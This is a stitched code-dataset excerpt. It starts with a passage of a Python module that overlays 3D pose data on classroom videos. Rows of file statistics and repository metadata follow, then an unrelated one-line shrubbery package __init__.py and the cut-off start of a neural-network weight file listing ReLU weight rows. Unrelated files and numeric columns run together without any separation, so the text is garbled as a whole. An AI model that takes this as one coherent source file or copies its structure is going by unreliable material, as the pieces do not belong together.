output_fourcc_string=output_fourcc_string,
concatenate_videos=concatenate_videos,
delete_individual_clips=delete_individual_clips,
parallel=parallel,
num_parallel_processes=num_parallel_processes,
task_progress_bar=task_progress_bar,
segment_progress_bar=segment_progress_bar,
notebook=notebook
)
def overlay_poses_3d_local(
start,
end,
pose_reconstruction_3d_inference_id,
base_dir,
environment_id,
pose_model_id,
output_directory='./video_overlays',
output_filename_prefix='poses_3d',
camera_assignment_ids=None,
camera_device_types=None,
camera_device_ids=None,
camera_part_numbers=None,
camera_names=None,
camera_serial_numbers=None,
pose_processing_subdirectory='pose_processing',
chunk_size=100,
client=None,
uri=None,
token_uri=None,
audience=None,
client_id=None,
client_secret=None,
local_video_directory='./videos',
video_filename_extension='mp4',
camera_calibrations=None,
keypoint_connectors=None,
pose_color='green',
keypoint_radius=3,
keypoint_alpha=0.6,
keypoint_connector_alpha=0.6,
keypoint_connector_linewidth=3,
output_filename_datetime_format='%Y%m%d_%H%M%S_%f',
output_filename_extension='avi',
output_fourcc_string='XVID',
concatenate_videos=True,
delete_individual_clips=True,
parallel=False,
num_parallel_processes=None,
task_progress_bar=False,
segment_progress_bar=False,
notebook=False
):
"""
Fetches 3D pose data from local files and overlays onto classroom videos.
Fetches and overlays onto all video clips that overlap with specified start
and end (e.g., if start is 10:32:56 and end is 10:33:20, returns videos
starting at 10:32:50, 10:33:00 and 10:33:10).
Script performs a logical AND across all camera specifications. If no camera
specifications are given, returns all active cameras in environment (as
determined by camera_device_types).
If keypoint connectors are not specified, script uses default keypoint
connectors for specified pose model.
Colors can be specifed as any string interpretable by
matplotlib.colors.to_hex().
Input data is assumed to be organized as specified by output of
reconstruct_poses_3d_local_by_time_segment().
Args:
start (datetime): Start of video overlay
end (datetime): End of video overlay
pose_extraction_2d_inference_id (str): Inference ID for source position data
base_dir: Base directory for local data (e.g., \'/data\')
environment_id (str): Honeycomb environment ID for source environment
pose_model_id (str): Honeycomb pose model ID for pose model that defines 2D/3D pose data structure
output_directory (str): Path to output directory (default is \'./video_overlays\')
output_filename_prefix (str): Filename prefix for output files (default is \'poses_3d\')
camera_assignment_ids (sequence of str): List of Honeycomb assignment IDs for target cameras (default is None)
camera_device_types (sequence of str): List of Honeycomb device types for target cameras (default is video_io.DEFAULT_CAMERA_DEVICE_TYPES)
camera_device_ids (sequence of str): List og Honeycomb device IDs for target cameras (default is None)
camera_part_numbers (sequence of str): List of Honeycomb part numbers for target cameras (default is None)
camera_names (sequence of str): List of Honeycomb device names for target cameras (default is None)
camera_serial_numbers (sequence of str): List of Honeycomb device serial numbers for target cameras (default is None)
pose_processing_subdirectory (str): subdirectory (under base directory) for all pose processing data (default is \'pose_processing\')
local_video_directory (str): Path to directory where local copies of Honeycomb videos are stored (default is \'./videos\')
video_filename_extension (str): Filename extension for local copies of Honeycomb videos (default is \'mp4\')
camera_calibrations (dict): Dict in format {DEVICE_ID: CAMERA_CALIBRATION_DATA} (default is None)
keypoint_connectors (array): Array of keypoints to connect with lines to form pose image (default is None)
pose_color (str): Color of pose (default is \'green\')
keypoint_radius (int): Radius of keypoins in pixels (default is 3)
keypoint_alpha (float): Alpha value for keypoints (default is 0.6)
keypoint_connector_alpha (float): Alpha value for keypoint connectors (default is 0.6)
keypoint_connector_linewidth (float): Line width for keypoint connectors (default is 3.0)
output_filename_datetime_format (str): Datetime format for output filename (default is \'%Y%m%d_%H%M%S_%f\')
output_filename_extension (str): Filename extension for output (determines file format) (default is \'avi\')
output_fourcc_string (str): FOURCC code for output format (default is \'XVID\')
concatenate_videos (bool): Boolean indicating whether to concatenate videos for each camera into single videos (default is True)
delete_individual_clips (bool): Boolean indicating whether to delete individual clips after concatenating (default is True)
parallel (bool): Boolean indicating whether to use multiple parallel processes (one for each time segment) (default is False)
num_parallel_processes (int): Number of parallel processes in pool (otherwise defaults to number of cores - 1) (default is None)
task_progress_bar (bool): Boolean indicating whether script should display an overall progress bar (default is False)
segment_progress_bar (bool): Boolean indicating whether script should display a progress bar for each clip (default is False)
notebook (bool): Boolean indicating whether script is being run in a Jupyter notebook (for progress bar display) (default is False)
"""
poses_3d_df = process_pose_data.local_io.fetch_data_local_by_time_segment(
start=start,
end=end,
base_dir=base_dir,
pipeline_stage='pose_reconstruction_3d',
environment_id=environment_id,
filename_stem='poses_3d',
inference_ids=pose_reconstruction_3d_inference_id,
data_ids=None,
sort_field=None,
object_type='dataframe',
pose_processing_subdirectory=pose_processing_subdirectory
)
process_pose_data.overlay.overlay_poses(
poses_df=poses_3d_df,
start=start,
end=end,
camera_assignment_ids=camera_assignment_ids,
environment_id=environment_id,
environment_name=None,
camera_device_types=camera_device_types,
camera_device_ids=camera_device_ids,
camera_part_numbers=camera_part_numbers,
camera_names=camera_names,
camera_serial_numbers=camera_serial_numbers,
chunk_size=chunk_size,
client=client,
uri=uri,
token_uri=token_uri,
audience=audience,
client_id=client_id,
client_secret=client_secret,
local_video_directory=local_video_directory,
video_filename_extension=video_filename_extension,
pose_model_id=pose_model_id,
camera_calibrations=None,
pose_label_column=None,
keypoint_connectors=keypoint_connectors,
pose_color=pose_color,
keypoint_radius=keypoint_radius,
keypoint_alpha=keypoint_alpha,
keypoint_connector_alpha=keypoint_connector_alpha,
keypoint_connector_linewidth=keypoint_connector_linewidth,
output_directory=output_directory,
output_filename_prefix=output_filename_prefix,
output_filename_datetime_format=output_filename_datetime_format,
output_filename_extension=output_filename_extension,
output_fourcc_string=output_fourcc_string,
concatenate_videos=concatenate_videos,
delete_individual_clips=delete_individual_clips,
parallel=parallel,
num_parallel_processes=num_parallel_processes,
task_progress_bar=task_progress_bar,
segment_progress_bar=segment_progress_bar,
notebook=notebook
)
def overlay_pose_tracks_3d_uninterpolated_local(
start,
end,
pose_tracking_3d_inference_id,
base_dir,
environment_id,
pose_model_id,
output_directory='./video_overlays',
output_filename_prefix='pose_tracks_3d_uninterpolated',
camera_assignment_ids=None,
camera_device_types=None,
camera_device_ids=None,
camera_part_numbers=None,
camera_names=None,
camera_serial_numbers=None,
pose_processing_subdirectory='pose_processing',
chunk_size=100,
client=None,
uri=None,
token_uri=None,
audience=None,
client_id=None,
client_secret=None,
local_video_directory='./videos',
video_filename_extension='mp4',
camera_calibrations=None,
keypoint_connectors=None,
pose_color='green',
keypoint_radius=3,
keypoint_alpha=0.6,
keypoint_connector_alpha=0.6,
keypoint_connector_linewidth=3,
pose_label_color='white',
pose_label_background_alpha=0.6,
pose_label_font_scale=1.5,
pose_label_line_width=1,
output_filename_datetime_format='%Y%m%d_%H%M%S_%f',
output_filename_extension='avi',
output_fourcc_string='XVID',
concatenate_videos=True,
delete_individual_clips=True,
parallel=False,
num_parallel_processes=None,
task_progress_bar=False,
segment_progress_bar=False,
notebook=False
):
"""
Fetches uninterpolated 3D pose track data from local files and overlays onto classroom videos.
Fetches and overlays onto all video clips that overlap with specified start
and end (e.g., if start is 10:32:56 and end is 10:33:20, returns videos
starting at 10:32:50, 10:33:00 and 10:33:10).
Script performs a logical AND across all camera specifications. If no camera
specifications are given, returns all active cameras in environment (as
determined by camera_device_types).
If keypoint connectors are not specified, script uses default keypoint
connectors for specified pose model.
Colors can be specifed as any string interpretable by
matplotlib.colors.to_hex().
Input data is assumed to be organized as specified by output of
generate_pose_tracks_3d_local_by_time_segment().
Args:
start (datetime): Start of video overlay
end (datetime): End of video overlay
pose_tracking_3d_inference_id (str): Inference ID for source position data
base_dir: Base directory for local data (e.g., \'/data\')
environment_id (str): Honeycomb environment ID for source environment
pose_model_id (str): Honeycomb pose model ID for pose model that defines 2D/3D pose data structure
output_directory (str): Path to output directory (default is \'./video_overlays\')
output_filename_prefix (str): Filename prefix for output files (default is \'pose_tracks_3d_uninterpolated\')
camera_assignment_ids (sequence of str): List of Honeycomb assignment IDs for target cameras (default is None)
camera_device_types (sequence of str): List of Honeycomb device types for target cameras (default is video_io.DEFAULT_CAMERA_DEVICE_TYPES)
camera_device_ids (sequence of str): List og Honeycomb device IDs for target cameras (default is None)
camera_part_numbers (sequence of str): List of Honeycomb part numbers for target cameras (default is None)
camera_names (sequence of str): List of Honeycomb device names for target cameras (default is None)
camera_serial_numbers (sequence of str): List of Honeycomb device serial numbers for target cameras (default is None)
pose_processing_subdirectory (str): subdirectory (under base directory) for all pose processing data (default is \'pose_processing\')
local_video_directory (str): Path to directory where local copies of Honeycomb videos are stored (default is \'./videos\')
video_filename_extension (str): Filename extension for local copies of Honeycomb videos (default is \'mp4\')
camera_calibrations (dict): Dict in format {DEVICE_ID: CAMERA_CALIBRATION_DATA} (default is None)
keypoint_connectors (array): Array of keypoints to connect with lines to form pose image (default is None)
pose_color (str): Color of pose (default is \'green\')
keypoint_radius (int): Radius of keypoins in pixels (default is 3)
keypoint_alpha (float): Alpha value for keypoints (default is 0.6)
keypoint_connector_alpha (float): Alpha value for keypoint connectors (default is 0.6)
keypoint_connector_linewidth (float): Line width for keypoint connectors (default is 3.0)
pose_label_color (str): Color for pose label text (default is 'white')
pose_label_background_alpha (float): Alpha value for pose label background (default is 0.6)
pose_label_font_scale (float): Font scale for pose label (default is 1.5)
pose_label_line_width (float): Line width for pose label text (default is 1.0)
output_filename_datetime_format (str): Datetime format for output filename (default is \'%Y%m%d_%H%M%S_%f\')
output_filename_extension (str): Filename extension for output (determines file format) (default is \'avi\')
output_fourcc_string (str): FOURCC code for output format (default is \'XVID\')
concatenate_videos (bool): Boolean indicating whether to concatenate videos for each camera into single videos (default is True)
delete_individual_clips (bool): Boolean indicating whether to delete individual clips after concatenating (default is True)
parallel (bool): Boolean indicating whether to use multiple parallel processes (one for each time segment) (default is False)
num_parallel_processes (int): Number of parallel processes in pool (otherwise defaults to number of cores - 1) (default is None)
task_progress_bar (bool): Boolean indicating whether script should display an overall progress bar (default is False)
segment_progress_bar (bool): Boolean indicating whether script should display a progress bar for each clip (default is False)
notebook (bool): Boolean indicating whether script is being run in a Jupyter notebook (for progress bar display) (default is False)
"""
pose_tracks_3d_uninterpolated_df = process_pose_data.local_io.fetch_3d_poses_with_uninterpolated_tracks_local(
base_dir=base_dir,
environment_id=environment_id,
pose_tracking_3d_inference_id=pose_tracking_3d_inference_id,
start=start,
end=end,
pose_processing_subdirectory=pose_processing_subdirectory
)
pose_tracks_3d_uninterpolated_df = process_pose_data.local_io.add_short_track_labels(
pose_tracks_3d_uninterpolated_df
)
process_pose_data.overlay.overlay_poses(
poses_df=pose_tracks_3d_uninterpolated_df,
start=start,
end=end,
camera_assignment_ids=camera_assignment_ids,
environment_id=environment_id,
environment_name=None,
camera_device_types=camera_device_types,
camera_device_ids=camera_device_ids,
camera_part_numbers=camera_part_numbers,
camera_names=camera_names,
camera_serial_numbers=camera_serial_numbers,
chunk_size=chunk_size,
client=client,
uri=uri,
token_uri=token_uri,
audience=audience,
client_id=client_id,
client_secret=client_secret,
local_video_directory=local_video_directory,
video_filename_extension=video_filename_extension,
pose_model_id=pose_model_id,
camera_calibrations=None,
pose_label_column='pose_track_3d_id_short',
keypoint_connectors=keypoint_connectors,
pose_color=pose_color,
keypoint_radius=keypoint_radius,
keypoint_alpha=keypoint_alpha,
keypoint_connector_alpha=keypoint_connector_alpha,
keypoint_connector_linewidth=keypoint_connector_linewidth,
pose_label_color=pose_label_color,
pose_label_background_alpha=pose_label_background_alpha,
pose_label_font_scale=pose_label_font_scale,
pose_label_line_width=pose_label_line_width,
output_directory=output_directory,
output_filename_prefix=output_filename_prefix,
output_filename_datetime_format=output_filename_datetime_format,
output_filename_extension=output_filename_extension,
output_fourcc_string=output_fourcc_string,
concatenate_videos=concatenate_videos,
delete_individual_clips=delete_individual_clips,
parallel=parallel,
num_parallel_processes=num_parallel_processes,
task_progress_bar=task_progress_bar,
segment_progress_bar=segment_progress_bar,
notebook=notebook
)
def overlay_pose_tracks_3d_interpolated_local(
start,
end,
pose_track_3d_interpolation_inference_id,
base_dir,
environment_id,
pose_model_id,
output_directory='./video_overlays',
output_filename_prefix='pose_tracks_3d_interpolated',
camera_assignment_ids=None,
camera_device_types=None,
camera_device_ids=None,
camera_part_numbers=None,
camera_names=None,
camera_serial_numbers=None,
pose_processing_subdirectory='pose_processing',
chunk_size=100,
client=None,
uri=None,
token_uri=None,
audience=None,
client_id=None,
client_secret=None,
local_video_directory='./videos',
video_filename_extension='mp4',
camera_calibrations=None,
keypoint_connectors=None,
pose_color='green',
keypoint_radius=3,
keypoint_alpha=0.6,
keypoint_connector_alpha=0.6,
keypoint_connector_linewidth=3,
pose_label_color='white',
pose_label_background_alpha=0.6,
pose_label_font_scale=1.5,
pose_label_line_width=1,
output_filename_datetime_format='%Y%m%d_%H%M%S_%f',
output_filename_extension='avi',
output_fourcc_string='XVID',
concatenate_videos=True,
delete_individual_clips=True,
parallel=False,
num_parallel_processes=None,
task_progress_bar=False,
segment_progress_bar=False,
notebook=False
):
"""
Fetches interpolated 3D pose track data from local files and overlays onto classroom videos.
Fetches and overlays onto all video clips that overlap with specified start
and end (e.g., if start is 10:32:56 and end is 10:33:20, returns videos
starting at 10:32:50, 10:33:00 and 10:33:10).
Script performs a logical AND across all camera specifications. If no camera
specifications are given, returns all active cameras in environment (as
determined by camera_device_types).
If keypoint connectors are not specified, script uses default keypoint
connectors for specified pose model.
Colors can be specifed as any string interpretable by
matplotlib.colors.to_hex().
Input data is assumed to be organized as specified by output of
interpolate_pose_tracks_3d_local_by_pose_track().
Args:
start (datetime): Start of video overlay
end (datetime): End of video overlay
pose_track_3d_interpolation_inference_id (str): Inference ID for source position data
base_dir: Base directory for local data (e.g., \'/data\')
environment_id (str): Honeycomb environment ID for source environment
pose_model_id (str): Honeycomb pose model ID for pose model that defines 2D/3D pose data structure
output_directory (str): Path to output directory (default is \'./video_overlays\')
output_filename_prefix (str): Filename prefix for output files (default is \'pose_tracks_3d_interpolated\')
camera_assignment_ids (sequence of str): List of Honeycomb assignment IDs for target cameras (default is None)
camera_device_types (sequence of str): List of Honeycomb device types for target cameras (default is video_io.DEFAULT_CAMERA_DEVICE_TYPES)
camera_device_ids (sequence of str): List og Honeycomb device IDs for target cameras (default is None)
camera_part_numbers (sequence of str): List of Honeycomb part numbers for target cameras (default is None)
camera_names (sequence of str): List of Honeycomb device names for target cameras (default is None)
camera_serial_numbers (sequence of str): List of Honeycomb device serial numbers for target cameras (default is None)
pose_processing_subdirectory (str): subdirectory (under base directory) for all pose processing data (default is \'pose_processing\')
local_video_directory (str): Path to directory where local copies of Honeycomb videos are stored (default is \'./videos\')
video_filename_extension (str): Filename extension for local copies of Honeycomb videos (default is \'mp4\')
camera_calibrations (dict): Dict in format {DEVICE_ID: CAMERA_CALIBRATION_DATA} (default is None)
keypoint_connectors (array): Array of keypoints to connect with lines to form pose image (default is None)
pose_color (str): Color of pose (default is \'green\')
keypoint_radius (int): Radius of keypoins in pixels (default is 3)
keypoint_alpha (float): Alpha value for keypoints (default is 0.6)
keypoint_connector_alpha (float): Alpha value for keypoint connectors (default is 0.6)
keypoint_connector_linewidth (float): Line width for keypoint connectors (default is 3.0)
pose_label_color (str): Color for pose label text (default is 'white')
pose_label_background_alpha (float): Alpha value for pose label background (default is 0.6)
pose_label_font_scale (float): Font scale for pose label (default is 1.5)
pose_label_line_width (float): Line width for pose label text (default is 1.0)
output_filename_datetime_format (str): Datetime format for output filename (default is \'%Y%m%d_%H%M%S_%f\')
output_filename_extension (str): Filename extension for output (determines file format) (default is \'avi\')
output_fourcc_string (str): FOURCC code for output format (default is \'XVID\')
concatenate_videos (bool): Boolean indicating whether to concatenate videos for each camera into single videos (default is True)
delete_individual_clips (bool): Boolean indicating whether to delete individual clips after concatenating (default is True)
parallel (bool): Boolean indicating whether to use multiple parallel processes (one for each time segment) (default is False)
num_parallel_processes (int): Number of parallel processes in pool (otherwise defaults to number of cores - 1) (default is None)
task_progress_bar (bool): Boolean indicating whether script should display an overall progress bar (default is False)
segment_progress_bar (bool): Boolean indicating whether script should display a progress bar for each clip (default is False)
notebook (bool): Boolean indicating whether script is being run in a Jupyter notebook (for progress bar display) (default is False)
"""
pose_tracks_3d_interpolated_df = process_pose_data.local_io.fetch_3d_poses_with_interpolated_tracks_local(
base_dir=base_dir,
environment_id=environment_id,
pose_track_3d_interpolation_inference_id=pose_track_3d_interpolation_inference_id,
start=start,
end=end,
pose_processing_subdirectory=pose_processing_subdirectory
)
pose_tracks_3d_interpolated_df = process_pose_data.local_io.add_short_track_labels(
pose_tracks_3d_interpolated_df
)
process_pose_data.overlay.overlay_poses(
poses_df=pose_tracks_3d_interpolated_df ,
start=start,
end=end,
camera_assignment_ids=camera_assignment_ids,
environment_id=environment_id,
environment_name=None,
camera_device_types=camera_device_types,
camera_device_ids=camera_device_ids,
camera_part_numbers=camera_part_numbers,
camera_names=camera_names,
camera_serial_numbers=camera_serial_numbers,
chunk_size=chunk_size,
client=client,
uri=uri,
token_uri=token_uri,
audience=audience,
client_id=client_id,
client_secret=client_secret,
local_video_directory=local_video_directory,
video_filename_extension=video_filename_extension,
pose_model_id=pose_model_id,
camera_calibrations=None,
pose_label_column='pose_track_3d_id_short',
keypoint_connectors=keypoint_connectors,
pose_color=pose_color,
keypoint_radius=keypoint_radius,
keypoint_alpha=keypoint_alpha,
keypoint_connector_alpha=keypoint_connector_alpha,
keypoint_connector_linewidth=keypoint_connector_linewidth,
pose_label_color=pose_label_color,
pose_label_background_alpha=pose_label_background_alpha,
pose_label_font_scale=pose_label_font_scale,
pose_label_line_width=pose_label_line_width,
output_directory=output_directory,
output_filename_prefix=output_filename_prefix,
output_filename_datetime_format=output_filename_datetime_format,
output_filename_extension=output_filename_extension,
output_fourcc_string=output_fourcc_string,
concatenate_videos=concatenate_videos,
delete_individual_clips=delete_individual_clips,
parallel=parallel,
num_parallel_processes=num_parallel_processes,
task_progress_bar=task_progress_bar,
segment_progress_bar=segment_progress_bar,
notebook=notebook
)
def overlay_pose_tracks_3d_identified_interpolated_local(
start,
end,
pose_track_3d_identification_inference_id,
base_dir,
environment_id,
pose_model_id,
output_directory='./video_overlays',
output_filename_prefix='pose_tracks_3d_identified_interpolated',
camera_assignment_ids=None,
camera_device_types=None,
camera_device_ids=None,
camera_part_numbers=None,
camera_names=None,
camera_serial_numbers=None,
pose_track_label_column='short_name',
pose_processing_subdirectory='pose_processing',
chunk_size=100,
client=None,
uri=None,
token_uri=None,
audience=None,
client_id=None,
client_secret=None,
local_video_directory='./videos',
video_filename_extension='mp4',
camera_calibrations=None,
keypoint_connectors=None,
pose_color='green',
keypoint_radius=3,
keypoint_alpha=0.6,
keypoint_connector_alpha=0.6,
keypoint_connector_linewidth=3,
pose_label_color='white',
pose_label_background_alpha=0.6,
pose_label_font_scale=1.5,
pose_label_line_width=1,
output_filename_datetime_format='%Y%m%d_%H%M%S_%f',
output_filename_extension='avi',
output_fourcc_string='XVID',
concatenate_videos=True,
delete_individual_clips=True,
parallel=False,
num_parallel_processes=None,
task_progress_bar=False,
segment_progress_bar=False,
notebook=False
):
"""
Fetches identified, interpolated 3D pose track data from local files and overlays onto classroom videos.
Fetches and overlays onto all video clips that overlap with specified start
and end (e.g., if start is 10:32:56 and end is 10:33:20, returns videos
starting at 10:32:50, 10:33:00 and 10:33:10).
Script performs a logical AND across all camera specifications. If no camera
specifications are given, returns all active cameras in environment (as
determined by camera_device_types).
If keypoint connectors are not specified, script uses default keypoint
connectors for specified pose model.
Colors can be specifed as any string interpretable by
matplotlib.colors.to_hex().
Input data is assumed to be organized as specified by output of
identify_pose_tracks_3d_local_by_segment().
Args:
start (datetime): Start of video overlay
end (datetime): End of video overlay
pose_track_3d_identification_inference_id (str): Inference ID for source position data
base_dir: Base directory for local data (e.g., \'/data\')
environment_id (str): Honeycomb environment ID for source environment
pose_model_id (str): Honeycomb pose model ID for pose model that defines 2D/3D pose data structure
output_directory (str): Path to output directory (default is \'./video_overlays\')
output_filename_prefix (str): Filename prefix for output files (default is \'pose_tracks_3d_identified_interpolated\')
camera_assignment_ids (sequence of str): List of Honeycomb assignment IDs for target cameras (default is None)
camera_device_types (sequence of str): List of Honeycomb device types for target cameras (default is video_io.DEFAULT_CAMERA_DEVICE_TYPES)
camera_device_ids (sequence of str): List og Honeycomb device IDs for target cameras (default is None)
camera_part_numbers (sequence of str): List of Honeycomb part numbers for target cameras (default is None)
camera_names (sequence of str): List of Honeycomb device names for target cameras (default is None)
camera_serial_numbers (sequence of str): List of Honeycomb device serial numbers for target cameras (default is None)
pose_track_label_column (str): Name of person data column to use for pose labels (default is \'short_name\')
pose_processing_subdirectory (str): subdirectory (under base directory) for all pose processing data (default is \'pose_processing\')
local_video_directory (str): Path to directory where local copies of Honeycomb videos are stored (default is \'./videos\')
video_filename_extension (str): Filename extension for local copies of Honeycomb videos (default is \'mp4\')
camera_calibrations (dict): Dict in format {DEVICE_ID: CAMERA_CALIBRATION_DATA} (default is None)
keypoint_connectors (array): Array of keypoints to connect with lines to form pose image (default is None)
pose_color (str): Color of pose (default is \'green\')
keypoint_radius (int): Radius of keypoins in pixels (default is 3)
keypoint_alpha (float): Alpha value for keypoints (default is 0.6)
keypoint_connector_alpha (float): Alpha value for keypoint connectors (default is 0.6)
keypoint_connector_linewidth (float): Line width for keypoint connectors (default is 3.0)
pose_label_color (str): Color for pose label text (default is 'white')
pose_label_background_alpha (float): Alpha value for pose label background (default is 0.6)
pose_label_font_scale (float): Font scale for pose label (default is 1.5)
pose_label_line_width (float): Line width for pose label text (default is 1.0)
output_filename_datetime_format (str): Datetime format for output filename (default is \'%Y%m%d_%H%M%S_%f\')
output_filename_extension (str): Filename extension for output (determines file format) (default is \'avi\')
output_fourcc_string (str): FOURCC code for output format (default is \'XVID\')
concatenate_videos (bool): Boolean indicating whether to concatenate videos for each camera into single videos (default is True)
delete_individual_clips (bool): Boolean indicating whether to delete individual clips after concatenating (default is True)
parallel (bool): Boolean indicating whether to use multiple parallel processes (one for each time segment) (default is False)
num_parallel_processes (int): Number of parallel processes in pool (otherwise defaults to number of cores - 1) (default is None)
task_progress_bar (bool): Boolean indicating whether script should display an overall progress bar (default is False)
segment_progress_bar (bool): Boolean indicating whether script should display a progress bar for each clip (default is False)
notebook (bool): Boolean indicating whether script is being run in a Jupyter notebook (for progress bar display) (default is False)
"""
pose_tracks_3d_identified_interpolated_df = process_pose_data.local_io.fetch_3d_poses_with_person_info(
base_dir=base_dir,
environment_id=environment_id,
pose_track_3d_identification_inference_id=pose_track_3d_identification_inference_id,
start=start,
end=end,
pose_processing_subdirectory=pose_processing_subdirectory,
client=client,
uri=uri,
token_uri=token_uri,
audience=audience,
client_id=client_id,
client_secret=client_secret
)
process_pose_data.overlay.overlay_poses(
poses_df=pose_tracks_3d_identified_interpolated_df,
start=start,
end=end,
camera_assignment_ids=camera_assignment_ids,
environment_id=environment_id,
environment_name=None,
camera_device_types=camera_device_types,
camera_device_ids=camera_device_ids,
camera_part_numbers=camera_part_numbers,
camera_names=camera_names,
camera_serial_numbers=camera_serial_numbers,
chunk_size=chunk_size,
client=client,
uri=uri,
token_uri=token_uri,
audience=audience,
client_id=client_id,
client_secret=client_secret,
local_video_directory=local_video_directory,
video_filename_extension=video_filename_extension,
pose_model_id=pose_model_id,
camera_calibrations=None,
pose_label_column=pose_track_label_column,
keypoint_connectors=keypoint_connectors,
pose_color=pose_color,
keypoint_radius=keypoint_radius,
keypoint_alpha=keypoint_alpha,
keypoint_connector_alpha=keypoint_connector_alpha,
keypoint_connector_linewidth=keypoint_connector_linewidth,
pose_label_color=pose_label_color,
pose_label_background_alpha=pose_label_background_alpha,
pose_label_font_scale=pose_label_font_scale,
pose_label_line_width=pose_label_line_width,
output_directory=output_directory,
output_filename_prefix=output_filename_prefix,
output_filename_datetime_format=output_filename_datetime_format,
output_filename_extension=output_filename_extension,
output_fourcc_string=output_fourcc_string,
concatenate_videos=concatenate_videos,
delete_individual_clips=delete_individual_clips,
parallel=parallel,
num_parallel_processes=num_parallel_processes,
task_progress_bar=task_progress_bar,
segment_progress_bar=segment_progress_bar,
notebook=notebook
)
def generate_metadata(
environment_id,
pipeline_stage,
parameters
):
metadata = {
'inference_id': uuid4().hex,
'infererence_execution_start': datetime.datetime.now(tz=datetime.timezone.utc),
'inference_execution_name': pipeline_stage,
'inference_execution_model': 'wf-process-pose-data',
'inference_execution_version': process_pose_data.__version__,
'parameters': parameters
}
return metadata
def extract_coordinate_space_id_from_camera_calibrations(camera_calibrations):
coordinate_space_ids = set([camera_calibration.get('space_id') for camera_calibration in camera_calibrations.values()])
if len(coordinate_space_ids) > 1:
raise ValueError('Multiple coordinate space IDs found in camera calibration data')
coordinate_space_id = list(coordinate_space_ids)[0]
return coordinate_space_id
def generate_pose_3d_limits(
pose_model_id,
room_x_limits,
room_y_limits,
client=None,
uri=None,
token_uri=None,
audience=None,
client_id=None,
client_secret=None
):
pose_model = honeycomb_io.fetch_pose_model_by_pose_model_id(
pose_model_id,
uri=uri,
token_uri=token_uri,
audience=audience,
client_id=client_id,
client_secret=client_secret
)
pose_model_name = pose_model.get('model_name')
pose_3d_limits = poseconnect.reconstruct.pose_3d_limits_by_pose_model(
room_x_limits=room_x_limits,
room_y_limits=room_y_limits,
pose_model_name=pose_model_name
)
return pose_3d_limits
| 48.33269 | 205 | 0.70676 | 18,806 | 150,218 | 5.303254 | 0.034298 | 0.030662 | 0.029519 | 0.021959 | 0.908967 | 0.889204 | 0.871066 | 0.855855 | 0.840564 | 0.82789 | 0 | 0.009122 | 0.22715 | 150,218 | 3,107 | 206 | 48.348246 | 0.849935 | 0.308066 | 0 | 0.781609 | 0 | 0.005337 | 0.134366 | 0.021259 | 0 | 0 | 0 | 0 | 0 | 1 | 0.007389 | false | 0 | 0.006158 | 0 | 0.020115 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
bad22ffd596534fb2cacc36c2735e28d42ddc44d | 110 | py | Python | shrubbery/shrubbery/__init__.py | jkleckner/cython_example | 4a0d66130cb713f7a2eff12185a0260df34850c5 | [
"Apache-2.0"
] | 9 | 2018-04-21T15:08:29.000Z | 2021-11-27T07:39:17.000Z | shrubbery/shrubbery/__init__.py | jkleckner/cython_example | 4a0d66130cb713f7a2eff12185a0260df34850c5 | [
"Apache-2.0"
] | null | null | null | shrubbery/shrubbery/__init__.py | jkleckner/cython_example | 4a0d66130cb713f7a2eff12185a0260df34850c5 | [
"Apache-2.0"
] | null | null | null | #from .shrubbing import standard_shrubbery, get_width, get_length
from .shrubbing import standard_shrubbery
| 22 | 65 | 0.845455 | 14 | 110 | 6.357143 | 0.571429 | 0.292135 | 0.426966 | 0.606742 | 0.808989 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.109091 | 110 | 4 | 66 | 27.5 | 0.908163 | 0.581818 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 9 |
2418097805986539e956b61d0f302dbe6bee5583 | 385,211 | pyt | Python | eran/NNet/nnet/ACASXU_run2a_2_3_batch_2000_16bit.pyt | pauls658/ReluDiff-ICSE2020-Artifact | 212854fe04f482183c239e5dfec70106a9a83df8 | [
"Apache-2.0"
] | 7 | 2020-01-27T21:25:49.000Z | 2022-01-07T04:37:37.000Z | eran/NNet/nnet/ACASXU_run2a_2_3_batch_2000_16bit.pyt | yqtianust/ReluDiff-ICSE2020-Artifact | 149f6efe4799602db749faa576980c36921a07c7 | [
"Apache-2.0"
] | 1 | 2022-01-25T17:41:54.000Z | 2022-01-26T02:27:51.000Z | eran/NNet/nnet/ACASXU_run2a_2_3_batch_2000_16bit.pyt | yqtianust/ReluDiff-ICSE2020-Artifact | 149f6efe4799602db749faa576980c36921a07c7 | [
"Apache-2.0"
] | 3 | 2020-03-14T17:12:17.000Z | 2022-03-16T09:50:46.000Z | ReLU
[[-0.0205536, 0.247547, -0.22162, -1.46965, -0.521872], [0.710832, 0.0446766, 0.210378, 0.0632681, -0.136324], [-0.0282998, 0.00491106, 1.68893, 0.0656829, -0.0454055], [0.0869821, 0.00150222, 0.0158949, -0.635404, -1.42556], [-0.0753982, 0.173193, -0.383985, -0.319155, 0.0246028], [0.0619609, -1.52835, 0.00669813, 0.0446679, -0.0895697], [0.0588217, -0.132968, 0.161161, -0.0640877, -1.27436], [-0.00566708, -0.0994157, -0.035463, -1.09963, 0.613878], [-0.461944, -0.0978144, 0.113282, -0.428043, 0.213594], [0.0509299, 1.24149, -1.22924, -0.0690498, 0.495966], [-0.00615383, 0.00481973, 1.17321, 0.0610198, -0.0479329], [-0.184854, 1.2465, 1.66498, 0.672174, -0.304357], [-1.58675, 0.0386128, -0.046232, -0.243469, 0.175518], [0.049292, 0.725318, 0.135358, -0.844547, -0.0424992], [0.056024, -0.109216, -0.00853776, -0.561847, -1.46146], [-0.00381822, -0.245589, 0.375144, -0.213999, -1.62968], [-0.0271461, 1.09685, 0.691986, 0.00494144, -0.0365058], [0.0501371, 0.0102551, -0.00609986, -1.25271, -0.714875], [-0.00096623, -0.0579098, 0.111794, 0.63606, -0.967184], [0.205268, 0.100215, -0.116159, -0.531469, -1.16496], [-0.00140001, -0.117962, 0.0986712, -1.42939, -0.596443], 